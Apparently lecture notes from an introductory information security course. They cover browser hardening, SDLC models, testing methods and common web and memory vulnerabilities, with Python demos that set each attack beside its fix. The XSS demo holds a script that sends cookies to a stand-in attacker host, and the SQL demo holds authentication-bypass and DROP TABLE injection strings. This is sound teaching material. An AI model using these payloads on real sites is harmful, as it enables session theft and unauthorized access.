Week 4 - 1st Sem Iaas311

The document discusses securing web browsers and applications. It provides tips for securely configuring web browsers by limiting cookies and plugins, enabling automatic site checking, and clearing browsing data. It also discusses principles of secure software development like the waterfall, spiral, agile, and rapid application development models. Testing methods like white box and black box testing are covered as well as software vulnerabilities.

Information Security 1
TOPIC DISCUSSION

8 Application Security
8.1 Web Browser Security
8.2 Web Browser Concerns
8.3 Web Browser Configuration
8.4 Securing Applications

9 Secure Software Development
9.1 SDLC Principles
9.2 Testing Methods
9.3 Software Vulnerabilities and Exploits
9.4 Buffer Overflows
9.5 XSS and XSRF
9.6 SQL Injection
Web Browser Security

Today, web browsers are installed on almost all computers. Because web browsers are used so frequently, it is vital to configure them securely. Often, the web browser that comes with an operating system is not set up in a secure default configuration. Not securing your web browser can quickly lead to a variety of computer problems, from spyware being installed without your knowledge to intruders taking control of your computer.
Web Browser Concerns

Attackers focus on exploiting client-side systems (your computer) through various vulnerabilities. They use these vulnerabilities to take control of your computer, steal your information, destroy your files, and use your computer to attack other computers. A low-cost method attackers use is to exploit vulnerabilities in web browsers: an attacker can create a malicious web page that installs Trojan software or spyware that steals your information.
Web Browser Configuration

One of the easiest "technologies" for keeping your information and computer safe is properly configuring the security settings of your web browser. Most people leave the settings at their defaults because it is convenient, but not taking those extra couple of minutes now can mean many costly hours (or weeks) later if your information is compromised.
Web Browser Configuration
Some setting suggestions for your browser

Limit cookie storage: Cookies are small data files a website stores on your computer to track information about you.

Don't store passwords or allow sites to remember your form entries: Some web pages ask whether you want to store information such as credit card numbers, usernames, or passwords.

Disable pop-ups: Pop-ups are generally advertisements or other small windows that force you to pay attention to them before you can get back to the web page you are on.

Limit plug-ins and add-ons: Downloaded toolbars, plug-ins, and add-ons can be helpful for enhancing your browsing experience, but the more items you attach to your browser, the larger the attack surface an attacker can exploit.

Enable automatic site checking: Automatic site checking, or other filters like it, checks the web pages you visit against a list of known fraudulent or malicious websites (a blacklist) and warns you or blocks the page before it loads.

Prompt for downloads: The automatic site checking mentioned above can help screen downloads for malware, but there are other settings you can configure that alert you when something is about to download, in case you accidentally click a link and realize you should not be downloading that item.

Clear browsing data: This removes all stored web data from your computer (cookies, cache, history, stored passwords/autofill data, etc.).
Securing Applications

Application security covers the controls that protect an application and the data it handles. One basic part of it is granting each user only the permissions they actually need within the application.
SDLC Principles

The Software Development Life Cycle (SDLC) can be approached in many ways, and over time a number of formal models have been created to provide a common framework for development. While formal SDLC models can be very detailed, with specific practices, procedures, and documentation, many organizations choose the elements of one or more models that best fit their organizational style, workflow, and requirements.
SDLC Principles
Waterfall Methodology

The Waterfall methodology is a sequential model in which each phase is followed by the next. Phases do not overlap, and each logically leads to the next.
SDLC Principles
Spiral Methodology

The Spiral model uses the linear development concepts from the Waterfall model and adds an iterative process that revisits four phases multiple times during the development life cycle to gather more detailed requirements, design functionality guided by the requirements, and build based on the
SDLC Principles
Agile Methodology

Agile software development is an iterative and incremental process, rather than the linear process that Waterfall and Spiral use. Agile is rooted in the Manifesto for Agile Software Development, a document that has four basic premises.

SDLC Principles
Agile 4 Basic Premises

01 Individuals and interactions are more important than processes and tools.
02 Working software is preferable to comprehensive documentation.
03 Customer collaboration replaces contract negotiation.
04 Responding to change is key, rather than following a plan.
SDLC Principles
Agile Methodology

Agile development uses a number of specialized terms:

> Backlogs
> Planning poker
> Timeboxing
> User stories
> Velocity tracking
SDLC Principles
Rapid Application Development

The RAD (Rapid Application Development) model is an iterative process that relies on building prototypes. Unlike many other methods, there is no separate planning phase; instead, planning is done as the software is written.
SDLC Principles
V model

The V model is an extension of the Waterfall model that pairs a testing phase with each development stage. Each phase starts only after the testing for the previous phase is done. Thus, at the requirements phase the requirements are reviewed (or tested), and at the design phase a test of the system design is completed before coding starts.
SDLC Principles
Big Bang SDLC model

The Big Bang SDLC model relies on no planning or process. Instead, it focuses on making resources available and simply starting to code based on requirements as they are revealed. Obviously the Big Bang model does not scale, but it is a common model for individual developers working on their own code.
Testing Methods

Test cases are derived using defined test techniques rather than guesswork. A technique tells the tester how to choose the test conditions with the greatest probability of finding errors, so the testing is systematic and the completeness of the software can be judged against it, instead of the tester guessing which test cases to pick.
Testing Methods
White box testing

White box testing means testing the software with knowledge of its internal structure and the code inside the program. It is highly effective in detecting and resolving problems, because bugs (a bug or fault is the manifestation of an error in the software) can often be found before they cause trouble in operation.
Testing Methods
Black box testing

Black box testing means testing the software against its output requirements, without any knowledge of the internal structure or code of the program. In other words, the system under test is treated as a black box: a device whose workings are neither understood by nor accessible to its user.
Software Vulnerabilities and Exploits

A software vulnerability is a glitch, flaw, or weakness present in an application or in the operating system (OS). Both the number of reported vulnerabilities and their potential impact keep growing. Common classes of software vulnerability include SQL injection, OS command injection, buffer overflow, uncontrolled format string, and integer overflow.
Buffer Overflows

Buffer overflows occur when an application receives more data than the buffer it stores that data in was sized to hold. The extra bytes are written past the end of the allocated space, into whatever happens to sit next in memory. Two outcomes matter. The application may crash, which is a denial of service. Or adjacent memory may be silently overwritten, corrupting important data; when that adjacent memory holds control data, such as a saved return address or a flag the program later trusts, the attacker can steer execution and run code of their choosing with the privileges of the vulnerable process. The root cause is almost always a programming error during development: copying into a fixed-size buffer without first checking the length of the input.
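The mechanism described above, as an added example that is not part of the original slides. It uses Python's ctypes to lay out a hypothetical login record exactly as a C struct would (a 16-byte name buffer followed by an integer flag), then copies attacker-controlled bytes into the name with no length check, the way an unchecked strcpy() would. The 17th byte lands in the flag. The record layout, field names, and the payloads are all constructed for this example.

```python
import ctypes

NAME_SIZE = 16  # assumed size of the fixed name buffer


class LoginRecord(ctypes.Structure):
    """Hypothetical record: a fixed 16-byte name followed by an is_admin flag.
    Like a C struct, the two fields sit back to back in memory."""
    _fields_ = [("name", ctypes.c_char * NAME_SIZE),
                ("is_admin", ctypes.c_int)]


def set_name_unchecked(rec: LoginRecord, data: bytes) -> None:
    """Models strcpy(): every byte of data is copied to the start of the record
    without checking the buffer size, so bytes 16.. spill into is_admin."""
    # Demo guard only: keep the write inside the struct so the interpreter's
    # own heap is never touched. A real strcpy() has no such guard.
    assert len(data) <= ctypes.sizeof(rec), "demo guard: payload exceeds the struct"
    ctypes.memmove(ctypes.addressof(rec), data, len(data))


def set_name_checked(rec: LoginRecord, data: bytes) -> bool:
    """Hardened copy: reject input that does not fit with its terminating NUL,
    so nothing can ever be written past the name buffer."""
    if len(data) >= NAME_SIZE:
        return False
    ctypes.memmove(ctypes.addressof(rec), data.ljust(NAME_SIZE, b"\x00"), NAME_SIZE)
    return True


def overflow_demo(payload: bytes) -> dict:
    """Creates a zeroed record, performs the unchecked copy, and reports what the
    program would now believe about the user."""
    rec = LoginRecord()  # ctypes zero-fills: name empty, is_admin == 0
    set_name_unchecked(rec, payload)
    return {"name": rec.name, "is_admin": rec.is_admin}


if __name__ == "__main__":
    print("normal input :", overflow_demo(b"alice"))
    # 17 bytes: the last one overwrites the low byte of is_admin (non-zero = admin)
    print("overflow     :", overflow_demo(b"A" * 17))
    rec = LoginRecord()
    print("checked copy accepted 17 bytes?", set_name_checked(rec, b"A" * 17))
```

The unchecked copy never reports a problem; the program simply continues with a flag it never set, which is why overflows are so dangerous in native code, where the neighbouring memory may be a return address rather than a flag. The checked version fails closed, returning False instead of truncating silently.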
XSS and XSRF

Cross-site scripting (XSS) happens when a site places attacker-supplied input into a page without encoding it, so the attacker's script runs in other users' browsers with the site's own privileges. With that foothold the script can read the user's cookies and send them to the attacker, redirect the user to a malicious website, or act on the site as that user. E-mail is one delivery channel: a message can carry an embedded HTML image object or a JavaScript image tag as part of a malicious cross-site scripting attack. Cross-site request forgery (XSRF, also written CSRF) is different: the attacker tricks an already logged-in user's browser into sending a request that the site accepts, because the browser attaches the session cookie automatically. The attacker creates a specially crafted HTML link or form, and the user performs the action without realizing it. The defense against XSS is output encoding of untrusted data; the defense against XSRF is a secret per-session token that a forged request cannot supply.
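Both attacks and their standard defenses, as an added example that is not from the original slides. The first half renders a constructed attacker comment into HTML with and without encoding; the second half shows a hypothetical money-transfer handler that rejects a forged request because the attacker's page cannot know the session-bound CSRF token. The comment text, the session identifiers, the form fields, and the server secret are all assumptions made for this example.

```python
import hashlib
import hmac
import html
import secrets

# Constructed attacker input: a "comment" that is really a script stealing cookies.
ATTACKER_COMMENT = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>'


def render_comment_unsafe(comment: str) -> str:
    """Vulnerable to XSS: the untrusted string is pasted straight into the HTML,
    so the browser treats the attacker's <script> as part of the page."""
    return f"<p class='comment'>{comment}</p>"


def render_comment_safe(comment: str) -> str:
    """Fixed: HTML-encode the untrusted string so < > & \" ' become entities and
    the browser displays the text instead of executing it."""
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


# --- XSRF/CSRF: tie every state-changing request to a value only the real page has.
SERVER_SECRET = secrets.token_bytes(32)  # assumed per-deployment secret, kept server-side


def csrf_token(session_id: str) -> str:
    """Token derived from the victim's session. A forged page can make the browser
    send the session cookie, but it cannot read or compute this value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(session_id: str, form: dict) -> str:
    """Server side of a hypothetical transfer form. The session_id stands in for
    the cookie the browser attached automatically; the token must come from the
    form body, which an attacker's page cannot fill in correctly."""
    submitted = form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, csrf_token(session_id)):
        return "rejected: missing or wrong CSRF token"
    return f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    print(render_comment_unsafe(ATTACKER_COMMENT))
    print(render_comment_safe(ATTACKER_COMMENT))
    # Forged request: the victim's browser sends its cookie, but no valid token.
    print(handle_transfer("victim-session", {"to": "attacker", "amount": "1000"}))
    # Legitimate request from the site's own form, which embedded the token.
    tok = csrf_token("victim-session")
    print(handle_transfer("victim-session", {"to": "bob", "amount": "10", "csrf_token": tok}))
```

The token check uses a constant-time comparison so an attacker cannot learn the token byte by byte from response timing, and the token is bound to the session so one user's token is useless for another user's requests.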
SQL Injection

In a SQL injection attack, the attacker enters additional data into a web page form, and because the application pastes that data into the text of its SQL statement, the attacker changes the statement the database actually runs. Two pieces of SQL syntax do most of the work: a semicolon (;) ends one statement so another can follow it, and two dashes (--) start a comment, so the rest of the line (for example, the remainder of the original WHERE clause) is ignored. The fix is never to build SQL text from user input: use parameterized queries, where the driver passes the values to the database separately from the statement.
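The injection described above run against a real database, as an added example that is not part of the original slides. It builds an in-memory SQLite table with constructed sample accounts, shows the comment (--) payload logging in as admin through a string-built query, shows the same payload failing against a parameterized query, and checks what happens to the semicolon (;) stacked-statement payload. The table, usernames, and passwords are invented for this example.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data; not real credentials."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                    [("admin", "s3cret"), ("alice", "hunter2")])
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    """The form fields become part of the SQL text itself, so a quote in the
    input closes the string literal and the rest is parsed as SQL."""
    query = (f"SELECT username FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con: sqlite3.Connection, username: str, password: str):
    """Placeholders: the driver sends the values separately from the statement,
    so quotes, semicolons and -- inside them are plain data."""
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def stacked_statement_accepted(con: sqlite3.Connection, username: str) -> bool:
    """Sends a `'; DROP TABLE users; --` style payload through the vulnerable
    path and reports whether the driver was willing to run the second statement."""
    try:
        login_vulnerable(con, username, "x")
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # Python's sqlite3 refuses more than one statement per execute().
        return False
    return True


if __name__ == "__main__":
    con = make_db()
    # The -- turns "' AND password = '...'" into a comment: no password needed.
    print("vulnerable:", login_vulnerable(con, "admin' --", "wrong"))
    # OR '1'='1 in both fields makes the WHERE clause true for every row.
    print("vulnerable:", login_vulnerable(con, "' OR '1'='1", "' OR '1'='1"))
    print("safe      :", login_safe(con, "admin' --", "wrong"))
    print("stacked ok:", stacked_statement_accepted(con, "x'; DROP TABLE users; --"))
```

The stacked-statement check is a caveat worth knowing: whether `; DROP TABLE` runs depends on the database driver, not on the attacker's skill. Python's sqlite3 `execute()` rejects it, while `executescript()` and many other drivers would run both statements. Do not rely on that; the comment payload alone was enough to bypass authentication, and only the parameterized query stops all of them.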